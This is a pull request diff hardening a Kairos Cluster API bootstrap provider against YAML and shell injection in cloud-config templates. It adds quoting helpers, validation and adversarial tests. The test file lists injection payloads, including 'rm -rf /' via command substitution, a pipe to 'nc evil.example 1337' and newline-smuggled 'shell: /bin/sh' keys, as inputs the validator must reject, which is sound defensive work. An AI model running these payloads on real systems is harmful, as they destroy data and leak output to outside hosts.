### PR TITLE
fix(bootstrap): escape user-controlled fields in cloud-config templates (KD-2)

### DIFF
--- a/go.mod
+++ b/go.mod
@@ -11,6 +11,7 @@ require (
 	github.com/spf13/cobra v1.10.2
 	github.com/spf13/viper v1.21.0
 	golang.org/x/crypto v0.46.0
+	gopkg.in/yaml.v3 v3.0.1
 	k8s.io/api v0.30.3
 	k8s.io/apiextensions-apiserver v0.30.3
 	k8s.io/apimachinery v0.30.3
@@ -82,7 +83,6 @@ require (
 	google.golang.org/protobuf v1.36.7 // indirect
 	gopkg.in/inf.v0 v0.9.1 // indirect
 	gopkg.in/yaml.v2 v2.4.0 // indirect
-	gopkg.in/yaml.v3 v3.0.1 // indirect
 	k8s.io/klog/v2 v2.120.1 // indirect
 	k8s.io/kube-openapi v0.0.0-20240228011516-70dd3763d340 // indirect
 	sigs.k8s.io/json v0.0.0-20221116044647-bc3834ca7abd // indirect

--- a/internal/bootstrap/funcs.go
+++ b/internal/bootstrap/funcs.go
@@ -1,0 +1,141 @@
+/*
+Copyright 2024 The Kairos CAPI Authors.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+implied. See the License for the specific language governing
+permissions and limitations under the License.
+*/
+
+package bootstrap
+
+import (
+	"bufio"
+	"strings"
+	"text/template"
+
+	yaml "gopkg.in/yaml.v3"
+)
+
+// newFuncMap returns the template FuncMap used by every cloud-config render.
+//
+// All user-controlled scalar fields must be piped through `quote` (for single
+// values) or `toYaml` (for slices, maps, or anything else complex). Raw
+// interpolation of user input into YAML is a known injection vector — a
+// hostname or password containing `\n  shell: /bin/sh` would otherwise grow
+// arbitrary keys in the rendered cloud-config that runs as root on first boot.
+//
+// `quote` and `toYaml` delegate to gopkg.in/yaml.v3, which:
+//   - leaves plain strings (alphanumerics, hyphens, dots, slashes) unquoted —
+//     so existing template output is unchanged for "safe" inputs;
+//   - quotes scalars that would otherwise be parsed as bool/int/null/etc.
+//     (e.g. `"true"`, `"123"`, `"yes"`);
+//   - quotes scalars containing YAML metacharacters (`:`, `#`, `---`, etc.).
+func newFuncMap() template.FuncMap {
+	return template.FuncMap{
+		"quote":      quote,
+		"toYaml":     toYaml,
+		"indent":     safeIndent,
+		"nindent":    nindent,
+		"trimSuffix": trimSuffix,
+	}
+}
+
+// quote marshals a scalar as a single YAML node and returns it without the
+// trailing newline emitted by yaml.Marshal. The returned string is safe to
+// drop into any YAML scalar position **provided the input contains no
+// newlines or other control characters** — see validateTemplateData and the
+// per-field validators in validate.go for the enforcement of that contract.
+//
+// We rely on yaml.v3's default style choice:
+//   - plain-safe values (alphanumerics, dots, hyphens, …) emit unquoted, so
+//     existing template output is unchanged for typical inputs;
+//   - YAML-ambiguous values (`true`, `123`, `null`, …) emit double-quoted to
+//     disambiguate from booleans/ints/null;
+//   - values containing YAML metacharacters (`:`, `#`, `---`, …) emit in the
+//     appropriate quoted form.
+//
+// We deliberately do NOT use DoubleQuotedStyle universally because that would
+// re-quote every safe value (`hostname: "foo"`) and break existing template
+// output contracts.
+//
+// Newlines: yaml.v3's default would pick a block-scalar form (`|-\n    foo`)
+// which is structurally correct in isolation but does not re-embed safely
+// into the surrounding template (the embedded indentation collides with the
+// parent template's). Inputs containing `\n` or `\r` are rejected upstream by
+// validateTemplateData; if one slips through, quote still produces valid YAML
+// but the surrounding template indentation may be off — fail loud rather
+// than silently emit half-broken userdata.
+func quote(v any) (string, error) {
+	b, err := yaml.Marshal(v)
+	if err != nil {
+		return "", err
+	}
+	return strings.TrimRight(string(b), "\n"), nil
+}
+
+// toYaml marshals any value (typically a slice or map) and trims the trailing
+// newline. Use `toYaml | nindent N` to embed the result at indent depth N
+// inside a parent block, e.g.:
+//
+//	ssh_authorized_keys:{{ .SSHKeys | toYaml | nindent 2 }}
+func toYaml(v any) (string, error) {
+	b, err := yaml.Marshal(v)
+	if err != nil {
+		return "", err
+	}
+	return strings.TrimRight(string(b), "\n"), nil
+}
+
+// safeIndent prepends `spaces` spaces to every non-empty line of s. Unlike a
+// naive strings.Split(s, "\n") implementation, this scanner-based version is
+// CRLF-safe: input lines ending in \r have the \r stripped so it doesn't leak
+// into the YAML block scalar (relevant when user-provided Manifest.Content was
+// authored on Windows).
+//
+// Empty lines are preserved without indentation so they don't accidentally
+// terminate a YAML block scalar.
+func safeIndent(spaces int, s string) string {
+	if s == "" {
+		return ""
+	}
+	pad := strings.Repeat(" ", spaces)
+	var sb strings.Builder
+	scanner := bufio.NewScanner(strings.NewReader(s))
+	// Match the previous implementation's default buffer size growth so we
+	// don't reject inputs with a single line longer than bufio's default 64k.
+	scanner.Buffer(make([]byte, 0, 64*1024), 1024*1024)
+	first := true
+	for scanner.Scan() {
+		if !first {
+			sb.WriteByte('\n')
+		}
+		first = false
+		line := scanner.Text() // Text() strips trailing \r
+		if line != "" {
+			sb.WriteString(pad)
+			sb.WriteString(line)
+		}
+	}
+	return sb.String()
+}
+
+// nindent emits a leading newline followed by safeIndent(spaces, s). Useful at
+// the start of a block-scalar interpolation where the caller wants the value
+// to flow onto its own line.
+func nindent(spaces int, s string) string {
+	return "\n" + safeIndent(spaces, s)
+}
+
+// trimSuffix is preserved for compatibility with existing template usage.
+// Argument order intentionally matches Sprig: trimSuffix(suffix, s).
+func trimSuffix(suffix, s string) string {
+	return strings.TrimSuffix(s, suffix)
+}

--- a/internal/bootstrap/template.go
+++ b/internal/bootstrap/template.go
@@ -20,7 +20,6 @@ import (
 	"bytes"
 	"embed"
 	"fmt"
-	"strings"
 	"text/template"
 
 	bootstrapv1beta2 "github.com/kairos-io/cluster-api-provider-kairos/api/bootstrap/v1beta2"
@@ -29,7 +28,12 @@ import (
 //go:embed templates/*.tmpl
 var templateFS embed.FS
 
-// TemplateData holds data for rendering the Kairos cloud-config template
+// TemplateData holds data for rendering the Kairos cloud-config template.
+//
+// Most string fields originate from KairosConfig spec (user-controlled). They
+// MUST be emitted through the `quote` template func — never as raw `{{ .X }}`
+// interpolation. See internal/bootstrap/funcs.go and the
+// cloudconfig-rendering-safety skill for the rules.
 type TemplateData struct {
 	Role                           string
 	SingleNode                     bool
@@ -50,7 +54,7 @@ type TemplateData struct {
 	ClusterNS                      string
 	IsKubeVirt                     bool
 	Install                        *InstallConfig
-	ProviderID                     string // ProviderID for the Node (e.g., "vsphere://<vm-uuid>")
+	ProviderID                     string // ProviderID for the Node (e.g., "vsphere://<vm-uuid>"). Validated against providerIDPattern at render time.
 	K3sServerURL                   string
 	K3sToken                       string
 	ControlPlaneLBServiceName      string
@@ -70,102 +74,47 @@ type InstallConfig struct {
 	Reboot bool
 }
 
-// RenderK0sCloudConfig renders the k0s Kairos cloud-config template
+// RenderK0sCloudConfig renders the k0s Kairos cloud-config template.
 func RenderK0sCloudConfig(data TemplateData) (string, error) {
-	// Load template (split per provider)
 	templatePath := "templates/k0s_kairos_cloud_config_capv.yaml.tmpl"
 	if data.IsKubeVirt {
 		templatePath = "templates/k0s_kairos_cloud_config_capk.yaml.tmpl"
 	}
-	tmplContent, err := templateFS.ReadFile(templatePath)
-	if err != nil {
-		return "", fmt.Errorf("failed to read template: %w", err)
-	}
-
-	// Create template with custom functions
-	tmpl := template.New("k0s_kairos_cloud_config").Funcs(template.FuncMap{
-		"indent": func(spaces int, s string) string {
-			if s == "" {
-				return ""
-			}
-			indent := strings.Repeat(" ", spaces)
-			lines := strings.Split(s, "\n")
-			var result []string
-			for _, line := range lines {
-				if line != "" {
-					result = append(result, indent+line)
-				} else {
-					result = append(result, "")
-				}
-			}
-			return strings.Join(result, "\n")
-		},
-		"trimSuffix": func(suffix, s string) string {
-			return strings.TrimSuffix(s, suffix)
-		},
-	})
-
-	// Parse template
-	tmpl, err = tmpl.Parse(string(tmplContent))
-	if err != nil {
-		return "", fmt.Errorf("failed to parse template: %w", err)
-	}
-
-	// Render template
-	var buf bytes.Buffer
-	if err := tmpl.Execute(&buf, data); err != nil {
-		return "", fmt.Errorf("failed to execute template: %w", err)
-	}
-
-	return buf.String(), nil
+	return renderTemplate("k0s_kairos_cloud_config", templatePath, data)
 }
 
-// RenderK3sCloudConfig renders the k3s Kairos cloud-config template
+// RenderK3sCloudConfig renders the k3s Kairos cloud-config template.
 func RenderK3sCloudConfig(data TemplateData) (string, error) {
-	// Load template (split per provider)
 	templatePath := "templates/k3s_kairos_cloud_config_capv.yaml.tmpl"
 	if data.IsKubeVirt {
 		templatePath = "templates/k3s_kairos_cloud_config_capk.yaml.tmpl"
 	}
+	return renderTemplate("k3s_kairos_cloud_config", templatePath, data)
+}
+
+// renderTemplate is the shared entry point for both distribution renderers.
+// It validates TemplateData, loads the template from the embedded FS, attaches
+// the shared FuncMap, executes, and returns the rendered cloud-config.
+//
+// Centralizing this prevents the FuncMap from drifting between the k0s and
+// k3s paths — a real risk in the previous two-function layout, since adding
+// `quote` to one and forgetting the other would silently leave half the
+// renders unsafe.
+func renderTemplate(name, templatePath string, data TemplateData) (string, error) {
+	if err := validateTemplateData(&data); err != nil {
+		return "", fmt.Errorf("invalid template data: %w", err)
+	}
 	tmplContent, err := templateFS.ReadFile(templatePath)
 	if err != nil {
-		return "", fmt.Errorf("failed to read template: %w", err)
+		return "", fmt.Errorf("failed to read template %s: %w", templatePath, err)
 	}
-
-	// Create template with custom functions
-	tmpl := template.New("k3s_kairos_cloud_config").Funcs(template.FuncMap{
-		"indent": func(spaces int, s string) string {
-			if s == "" {
-				return ""
-			}
-			indent := strings.Repeat(" ", spaces)
-			lines := strings.Split(s, "\n")
-			var result []string
-			for _, line := range lines {
-				if line != "" {
-					result = append(result, indent+line)
-				} else {
-					result = append(result, "")
-				}
-			}
-			return strings.Join(result, "\n")
-		},
-		"trimSuffix": func(suffix, s string) string {
-			return strings.TrimSuffix(s, suffix)
-		},
-	})
-
-	// Parse template
-	tmpl, err = tmpl.Parse(string(tmplContent))
+	tmpl, err := template.New(name).Funcs(newFuncMap()).Parse(string(tmplContent))
 	if err != nil {
-		return "", fmt.Errorf("failed to parse template: %w", err)
+		return "", fmt.Errorf("failed to parse template %s: %w", templatePath, err)
 	}
-
-	// Render template
 	var buf bytes.Buffer
 	if err := tmpl.Execute(&buf, data); err != nil {
-		return "", fmt.Errorf("failed to execute template: %w", err)
+		return "", fmt.Errorf("failed to execute template %s: %w", templatePath, err)
 	}
-
 	return buf.String(), nil
 }

--- a/internal/bootstrap/template_adversarial_test.go
+++ b/internal/bootstrap/template_adversarial_test.go
@@ -1,0 +1,411 @@
+/*
+Copyright 2024 The Kairos CAPI Authors.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+implied. See the License for the specific language governing
+permissions and limitations under the License.
+*/
+
+package bootstrap
+
+import (
+	"strings"
+	"testing"
+
+	yaml "gopkg.in/yaml.v3"
+)
+
+// TestValidateProviderID_PositiveCases asserts that every real-world
+// ProviderID we accept from upstream infrastructure providers is allowed
+// by the validator. If any of these starts failing, the regex needs to be
+// relaxed — but only with a documented reason.
+func TestValidateProviderID_PositiveCases(t *testing.T) {
+	cases := []struct {
+		name string
+		id   string
+	}{
+		{"empty (workers, pre-providerID)", ""},
+		{"vsphere uuid", "vsphere://422fa74a-5d60-3a4a-af24-1f07be515fcc"},
+		{"kubevirt namespaced", "kubevirt://default/vm-name-0"},
+		{"kubevirt complex name", "kubevirt://ns-1/pool.vm-controlplane-0"},
+		{"docker", "docker:///kind-cluster-control-plane"},
+		{"aws", "aws:///us-east-1a/i-0123456789abcdef0"},
+		{"gce", "gce://my-project/us-central1-a/instance-name"},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			if err := ValidateProviderID(tc.id); err != nil {
+				t.Fatalf("ValidateProviderID(%q): unexpected error: %v", tc.id, err)
+			}
+		})
+	}
+}
+
+// TestValidateProviderID_RejectsInjection is the heart of KD-2: the validator
+// MUST reject every shell-injection payload that would otherwise execute as
+// root at first boot. ProviderID is interpolated into a shell `printf`/`echo`
+// inside a systemd ExecStartPre directive in the rendered cloud-config; any
+// character that escapes the shell context here is RCE.
+func TestValidateProviderID_RejectsInjection(t *testing.T) {
+	cases := []struct {
+		name string
+		id   string
+	}{
+		{"shell escape via double quote", `vsphere://abc"; rm -rf /; echo "`},
+		{"json escape", `vsphere://abc"},"evil":"yes`},
+		{"command substitution", "vsphere://abc$(rm -rf /)"},
+		{"backtick command substitution", "vsphere://abc`rm -rf /`"},
+		{"newline", "vsphere://abc\nrm -rf /"},
+		{"semicolon", "vsphere://abc; rm -rf /"},
+		{"pipe", "vsphere://abc | nc evil.example 1337"},
+		{"single quote", "vsphere://abc'OR'1'='1"},
+		{"yaml block break", "vsphere://abc\n---\n: bad"},
+		{"missing scheme", "no-scheme-here"},
+		{"scheme starts with digit", "1bad://value"},
+		{"empty path", "vsphere://"},
+		{"trailing whitespace", "vsphere://abc "},
+		{"leading whitespace", " vsphere://abc"},
+		{"NUL byte", "vsphere://abc\x00bad"},
+		{"BEL byte", "vsphere://abc\x07bad"},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			if err := ValidateProviderID(tc.id); err == nil {
+				t.Fatalf("ValidateProviderID(%q): expected rejection, got nil", tc.id)
+			}
+		})
+	}
+}
+
+// TestRenderRejectsBadProviderID asserts the renderer itself refuses to emit
+// userdata with an invalid ProviderID. This is the defense-in-depth guarantee
+// the cloudconfig-rendering-safety skill calls for: validation in the
+// webhook/controller, AND at render time.
+func TestRenderRejectsBadProviderID(t *testing.T) {
+	data := TemplateData{
+		Role:       "control-plane",
+		SingleNode: true,
+		UserName:   "kairos",
+		ProviderID: `vsphere://abc"; rm -rf /; echo "`,
+	}
+	if _, err := RenderK0sCloudConfig(data); err == nil {
+		t.Errorf("RenderK0sCloudConfig with injection payload: expected error, got nil")
+	}
+	if _, err := RenderK3sCloudConfig(data); err == nil {
+		t.Errorf("RenderK3sCloudConfig with injection payload: expected error, got nil")
+	}
+}
+
+// adversarialPayloads covers YAML-injection payloads every escaped scalar
+// field must survive. The test renders, parses the rendered YAML back, and
+// asserts the field round-trips to the original input — proving no metachar
+// escaped its scalar.
+//
+// Payloads that contain `\n`, `\r`, or NUL are deliberately NOT in this map:
+// validateTemplateData rejects them outright (see controlCharPayloads below).
+// They would otherwise force yaml.v3 into a block-scalar form that doesn't
+// re-embed safely into the surrounding template.
+var adversarialPayloads = map[string]string{
+	"trailing colon":        "foo:",
+	"colon space":           "foo: bar",
+	"colon space hash":      "foo: # comment",
+	"yaml flow mapping":     "{evil: true}",
+	"shell metas":           `"; rm -rf /; echo "`,
+	"bool-y value (true)":   "true",
+	"bool-y value (yes)":    "yes",
+	"int-y value":           "12345",
+	"null-y value":          "null",
+	"backslash and quote":   `\"\\`,
+	"unicode":               "héllo-wörld",
+	"leading dash":          "-dash-prefix",
+	"leading hash":          "#commenty",
+	"tab character":         "foo\tbar",
+	"single quote":          "it's a test",
+	"yaml anchor character": "&anchor",
+	"yaml alias character":  "*alias",
+}
+
+// controlCharPayloads MUST be rejected by validateTemplateData. These are the
+// characters that break either (a) the surrounding YAML's block-scalar /
+// list-item indentation contract or (b) shell quoting in the file-content
+// block scalars where some fields are also embedded.
+var controlCharPayloads = map[string]string{
+	"newline injection":  "foo\nshell: /bin/sh",
+	"crlf newline":       "foo\r\nbar",
+	"yaml doc separator": "---\nevil: true",
+	"NUL byte":           "foo\x00bar",
+	"bare carriage return": "foo\rbar",
+}
+
+// TestRender_AdversarialHostname checks that a malicious Hostname produces
+// well-formed YAML that round-trips to the original value, for both
+// distributions on both infra paths.
+func TestRender_AdversarialHostname(t *testing.T) {
+	for name, payload := range adversarialPayloads {
+		for _, isKV := range []bool{false, true} {
+			for _, dist := range []string{"k0s", "k3s"} {
+				caseName := name + "/" + dist
+				if isKV {
+					caseName += "/capk"
+				} else {
+					caseName += "/capv"
+				}
+				t.Run(caseName, func(t *testing.T) {
+					data := TemplateData{
+						Role:       "control-plane",
+						SingleNode: true,
+						Hostname:   payload,
+						UserName:   "kairos",
+						IsKubeVirt: isKV,
+					}
+					out, err := renderForDist(dist, data)
+					if err != nil {
+						t.Fatalf("render: %v", err)
+					}
+					assertHostnameRoundTrips(t, out, payload)
+				})
+			}
+		}
+	}
+}
+
+// TestRender_AdversarialUserPassword checks that a malicious UserPassword
+// (the most likely user-controlled secret) does not break the YAML or leak
+// across into a sibling key. We assert YAML validity and that the password
+// round-trips on the first user entry.
+func TestRender_AdversarialUserPassword(t *testing.T) {
+	for name, payload := range adversarialPayloads {
+		t.Run(name, func(t *testing.T) {
+			data := TemplateData{
+				Role:         "control-plane",
+				SingleNode:   true,
+				Hostname:     "host",
+				UserName:     "kairos",
+				UserPassword: payload,
+			}
+			out, err := RenderK0sCloudConfig(data)
+			if err != nil {
+				t.Fatalf("render: %v", err)
+			}
+			assertUserPasswordRoundTrips(t, out, payload)
+		})
+	}
+}
+
+// TestRender_AdversarialUserGroups checks the slice-quoting path: a malicious
+// group name must not collapse a list item into a mapping.
+func TestRender_AdversarialUserGroups(t *testing.T) {
+	for name, payload := range adversarialPayloads {
+		t.Run(name, func(t *testing.T) {
+			data := TemplateData{
+				Role:         "control-plane",
+				SingleNode:   true,
+				Hostname:     "host",
+				UserName:     "kairos",
+				UserPassword: "ok",
+				UserGroups:   []string{"admin", payload},
+			}
+			out, err := RenderK0sCloudConfig(data)
+			if err != nil {
+				t.Fatalf("render: %v", err)
+			}
+			groups := firstUserGroups(t, out)
+			if len(groups) != 2 {
+				t.Fatalf("expected 2 groups, got %d: %#v", len(groups), groups)
+			}
+			if groups[0] != "admin" || groups[1] != payload {
+				t.Errorf("groups did not round-trip: got %#v, want [admin, %q]", groups, payload)
+			}
+		})
+	}
+}
+
+// TestRender_AdversarialDNSServers checks the DNS list-quoting path.
+func TestRender_AdversarialDNSServers(t *testing.T) {
+	for name, payload := range adversarialPayloads {
+		t.Run(name, func(t *testing.T) {
+			data := TemplateData{
+				Role:         "control-plane",
+				SingleNode:   true,
+				Hostname:     "host",
+				UserName:     "kairos",
+				UserPassword: "ok",
+				DNSServers:   []string{"1.1.1.1", payload},
+			}
+			out, err := RenderK0sCloudConfig(data)
+			if err != nil {
+				t.Fatalf("render: %v", err)
+			}
+			// Output must parse as YAML — that's enough for the list case.
+			var doc map[string]any
+			if err := yaml.Unmarshal([]byte(stripCloudConfigHeader(out)), &doc); err != nil {
+				t.Fatalf("rendered YAML did not parse: %v\n---\n%s", err, out)
+			}
+		})
+	}
+}
+
+// TestRender_RejectsControlChars asserts that the render-time validator
+// refuses to emit userdata when any string field contains a forbidden
+// control character (newline, CR, NUL). These would otherwise either inject
+// extra YAML keys or break the block-scalar embed of fields that also appear
+// inside file-content / shell contexts.
+//
+// We exercise the rejection on several field types to confirm the generic
+// rejectControlChars rule fires uniformly.
+func TestRender_RejectsControlChars(t *testing.T) {
+	for name, payload := range controlCharPayloads {
+		t.Run("Hostname/"+name, func(t *testing.T) {
+			data := TemplateData{Role: "control-plane", SingleNode: true, Hostname: payload, UserName: "kairos"}
+			if _, err := RenderK0sCloudConfig(data); err == nil {
+				t.Errorf("Hostname=%q: expected render error, got nil", payload)
+			}
+		})
+		t.Run("UserPassword/"+name, func(t *testing.T) {
+			data := TemplateData{Role: "control-plane", SingleNode: true, Hostname: "h", UserName: "kairos", UserPassword: payload}
+			if _, err := RenderK0sCloudConfig(data); err == nil {
+				t.Errorf("UserPassword=%q: expected render error, got nil", payload)
+			}
+		})
+		t.Run("WorkerToken/"+name, func(t *testing.T) {
+			data := TemplateData{Role: "worker", Hostname: "h", UserName: "kairos", WorkerToken: payload}
+			if _, err := RenderK0sCloudConfig(data); err == nil {
+				t.Errorf("WorkerToken=%q: expected render error, got nil", payload)
+			}
+		})
+		t.Run("UserGroups/"+name, func(t *testing.T) {
+			data := TemplateData{Role: "control-plane", SingleNode: true, Hostname: "h", UserName: "kairos", UserGroups: []string{"admin", payload}}
+			if _, err := RenderK0sCloudConfig(data); err == nil {
+				t.Errorf("UserGroups[1]=%q: expected render error, got nil", payload)
+			}
+		})
+		t.Run("DNSServers/"+name, func(t *testing.T) {
+			data := TemplateData{Role: "control-plane", SingleNode: true, Hostname: "h", UserName: "kairos", DNSServers: []string{"1.1.1.1", payload}}
+			if _, err := RenderK0sCloudConfig(data); err == nil {
+				t.Errorf("DNSServers[1]=%q: expected render error, got nil", payload)
+			}
+		})
+	}
+}
+
+// TestSafeIndent_CRLF asserts the indent function strips \r so Windows-authored
+// Manifest.Content doesn't leak \r into the YAML block scalar (which would
+// then propagate into files written on the node).
+func TestSafeIndent_CRLF(t *testing.T) {
+	in := "line1\r\nline2\r\nline3"
+	out := safeIndent(2, in)
+	if strings.Contains(out, "\r") {
+		t.Errorf("safeIndent leaked \\r: %q", out)
+	}
+	want := "  line1\n  line2\n  line3"
+	if out != want {
+		t.Errorf("safeIndent CRLF result: got %q, want %q", out, want)
+	}
+}
+
+// --- helpers ---
+
+func renderForDist(dist string, data TemplateData) (string, error) {
+	if dist == "k0s" {
+		return RenderK0sCloudConfig(data)
+	}
+	return RenderK3sCloudConfig(data)
+}
+
+// stripCloudConfigHeader removes the leading `#cloud-config` marker so the
+// remaining text can be parsed as a single YAML document.
+func stripCloudConfigHeader(s string) string {
+	for _, prefix := range []string{"#cloud-config\n", "#cloud-config\r\n"} {
+		if strings.HasPrefix(s, prefix) {
+			return strings.TrimPrefix(s, prefix)
+		}
+	}
+	return s
+}
+
+func parseRendered(t *testing.T, out string) map[string]any {
+	t.Helper()
+	var doc map[string]any
+	if err := yaml.Unmarshal([]byte(stripCloudConfigHeader(out)), &doc); err != nil {
+		t.Fatalf("rendered YAML did not parse: %v\n---\n%s", err, out)
+	}
+	return doc
+}
+
+func assertHostnameRoundTrips(t *testing.T, out, want string) {
+	t.Helper()
+	doc := parseRendered(t, out)
+	got, ok := doc["hostname"].(string)
+	if !ok {
+		// hostname is omitted only when both Hostname and HostnamePrefix are empty.
+		// Our tests always set Hostname, so a missing or non-string value is a bug.
+		t.Fatalf("hostname missing or not a string: %T %#v", doc["hostname"], doc["hostname"])
+	}
+	if got != want {
+		t.Errorf("hostname did not round-trip:\n got: %q\nwant: %q", got, want)
+	}
+}
+
+// assertUserPasswordRoundTrips finds the first non-`capk` user in `users:`
+// and asserts its passwd field matches `want`.
+func assertUserPasswordRoundTrips(t *testing.T, out, want string) {
+	t.Helper()
+	users := allUsers(t, out)
+	for _, u := range users {
+		if name, _ := u["name"].(string); name == "capk" {
+			continue
+		}
+		got, ok := u["passwd"].(string)
+		if !ok {
+			t.Fatalf("first non-capk user has no string passwd: %#v", u)
+		}
+		if got != want {
+			t.Errorf("user passwd did not round-trip:\n got: %q\nwant: %q", got, want)
+		}
+		return
+	}
+	t.Fatalf("no non-capk user found in users[] (parsed: %#v)", users)
+}
+
+// firstUserGroups returns the groups slice from the first non-capk user entry.
+func firstUserGroups(t *testing.T, out string) []string {
+	t.Helper()
+	users := allUsers(t, out)
+	for _, u := range users {
+		if name, _ := u["name"].(string); name == "capk" {
+			continue
+		}
+		raw, _ := u["groups"].([]any)
+		groups := make([]string, 0, len(raw))
+		for _, g := range raw {
+			s, _ := g.(string)
+			groups = append(groups, s)
+		}
+		return groups
+	}
+	t.Fatalf("no non-capk user found in users[] (parsed: %#v)", users)
+	return nil
+}
+
+func allUsers(t *testing.T, out string) []map[string]any {
+	t.Helper()
+	doc := parseRendered(t, out)
+	rawUsers, ok := doc["users"].([]any)
+	if !ok {
+		t.Fatalf("users[] missing or not a list: %T %#v", doc["users"], doc["users"])
+	}
+	users := make([]map[string]any, 0, len(rawUsers))
+	for _, u := range rawUsers {
+		m, _ := u.(map[string]any)
+		users = append(users, m)
+	}
+	return users
+}

--- a/internal/bootstrap/template_test.go
+++ b/internal/bootstrap/template_test.go
@@ -537,9 +537,10 @@ func TestRenderK0sCloudConfig_WithInstallConfig(t *testing.T) {
 		t.Error("Missing install.auto: true")
 	}
 
-	// Check for install.device
-	if !strings.Contains(result, "device: \"auto\"") {
-		t.Error("Missing install.device: \"auto\"")
+	// Check for install.device — YAML emits unquoted for safe values like "auto".
+	// The semantic invariant is that install.device == "auto" after parsing.
+	if !strings.Contains(result, "device: auto") {
+		t.Error("Missing install.device: auto")
 	}
 
 	// Check for install.reboot

--- a/internal/bootstrap/templates/k0s_kairos_cloud_config_capk.yaml.tmpl
+++ b/internal/bootstrap/templates/k0s_kairos_cloud_config_capk.yaml.tmpl
@@ -22,32 +22,32 @@ Template inputs (from Go):
 {{/* Hostname: prefer explicit name, else use hostname prefix with Kairos templating for machine ID */}}
 {{/* The {{ trunc 4 .MachineID }} is Kairos templating syntax, output literally */}}
 {{- if .Hostname }}
-hostname: {{ .Hostname }}
+hostname: {{ .Hostname | quote }}
 {{- else if .HostnamePrefix }}
-hostname: {{ .HostnamePrefix }}{{ "{{ trunc 4 .MachineID }}" }}
+hostname: {{ printf "%s{{ trunc 4 .MachineID }}" .HostnamePrefix | quote }}
 {{- end }}
 
 {{- if .Install }}
 install:
   auto: {{ .Install.Auto }}
-  device: "{{ .Install.Device }}"
+  device: {{ .Install.Device | quote }}
   reboot: {{ .Install.Reboot }}
 {{- end }}
 
 users:
-- name: {{ .UserName }}
-  passwd: {{ .UserPassword }}
+- name: {{ .UserName | quote }}
+  passwd: {{ .UserPassword | quote }}
   groups:
   {{- range .UserGroups }}
-    - {{ . }}
+    - {{ . | quote }}
   {{- end }}
   {{- if or .GitHubUser .SSHPublicKey }}
   ssh_authorized_keys:
   {{- if .GitHubUser }}
-    - github:{{ .GitHubUser }}
+    - {{ printf "github:%s" .GitHubUser | quote }}
   {{- end }}
   {{- if .SSHPublicKey }}
-    - {{ .SSHPublicKey }}
+    - {{ .SSHPublicKey | quote }}
   {{- end }}
   {{- end }}
 - name: capk
@@ -93,15 +93,15 @@ write_files:
       {{- if .ControlPlaneLBEndpoint }}
         api:
           sans:
-            - {{ .ControlPlaneLBEndpoint }}
+            - {{ .ControlPlaneLBEndpoint | quote }}
       {{- end }}
       {{- if or .PodCIDR .ServiceCIDR }}
         network:
       {{ if .PodCIDR }}
-          podCIDR: {{ .PodCIDR }}
+          podCIDR: {{ .PodCIDR | quote }}
       {{ end }}
       {{ if .ServiceCIDR }}
-          serviceCIDR: {{ .ServiceCIDR }}
+          serviceCIDR: {{ .ServiceCIDR | quote }}
       {{ end }}
       {{- end }}
       {{- else }}
@@ -554,7 +554,7 @@ stages:
       dns:
         nameservers:
         {{- range .DNSServers }}
-          - {{ . }}
+          - {{ . | quote }}
         {{- end }}
         path: "/etc/resolv.conf"
     {{- end }}

--- a/internal/bootstrap/templates/k0s_kairos_cloud_config_capv.yaml.tmpl
+++ b/internal/bootstrap/templates/k0s_kairos_cloud_config_capv.yaml.tmpl
@@ -22,32 +22,32 @@ Template inputs (from Go):
 {{/* Hostname: prefer explicit name, else use hostname prefix with Kairos templating for machine ID */}}
 {{/* The {{ trunc 4 .MachineID }} is Kairos templating syntax, output literally */}}
 {{- if .Hostname }}
-hostname: {{ .Hostname }}
+hostname: {{ .Hostname | quote }}
 {{- else if .HostnamePrefix }}
-hostname: {{ .HostnamePrefix }}{{ "{{ trunc 4 .MachineID }}" }}
+hostname: {{ printf "%s{{ trunc 4 .MachineID }}" .HostnamePrefix | quote }}
 {{- end }}
 
 {{- if .Install }}
 install:
   auto: {{ .Install.Auto }}
-  device: "{{ .Install.Device }}"
+  device: {{ .Install.Device | quote }}
   reboot: {{ .Install.Reboot }}
 {{- end }}
 
 users:
-- name: {{ .UserName }}
-  passwd: {{ .UserPassword }}
+- name: {{ .UserName | quote }}
+  passwd: {{ .UserPassword | quote }}
   groups:
   {{- range .UserGroups }}
-    - {{ . }}
+    - {{ . | quote }}
   {{- end }}
   {{- if or .GitHubUser .SSHPublicKey }}
   ssh_authorized_keys:
   {{- if .GitHubUser }}
-    - github:{{ .GitHubUser }}
+    - {{ printf "github:%s" .GitHubUser | quote }}
   {{- end }}
   {{- if .SSHPublicKey }}
-    - {{ .SSHPublicKey }}
+    - {{ .SSHPublicKey | quote }}
   {{- end }}
   {{- end }}
 - name: capk
@@ -92,10 +92,10 @@ write_files:
       spec:
         network:
       {{ if .PodCIDR }}
-          podCIDR: {{ .PodCIDR }}
+          podCIDR: {{ .PodCIDR | quote }}
       {{ end }}
       {{ if .ServiceCIDR }}
-          serviceCIDR: {{ .ServiceCIDR }}
+          serviceCIDR: {{ .ServiceCIDR | quote }}
       {{ end }}
       {{- else }}
       spec: {}
@@ -132,7 +132,7 @@ stages:
       dns:
         nameservers:
         {{- range .DNSServers }}
-          - {{ . }}
+          - {{ . | quote }}
         {{- end }}
         path: "/etc/resolv.conf"
     {{- end }}

--- a/internal/bootstrap/templates/k3s_kairos_cloud_config_capk.yaml.tmpl
+++ b/internal/bootstrap/templates/k3s_kairos_cloud_config_capk.yaml.tmpl
@@ -23,32 +23,32 @@ Template inputs (from Go):
 {{/* Hostname: prefer explicit name, else use hostname prefix with Kairos templating for machine ID */}}
 {{/* The {{ trunc 4 .MachineID }} is Kairos templating syntax, output literally */}}
 {{- if .Hostname }}
-hostname: {{ .Hostname }}
+hostname: {{ .Hostname | quote }}
 {{- else if .HostnamePrefix }}
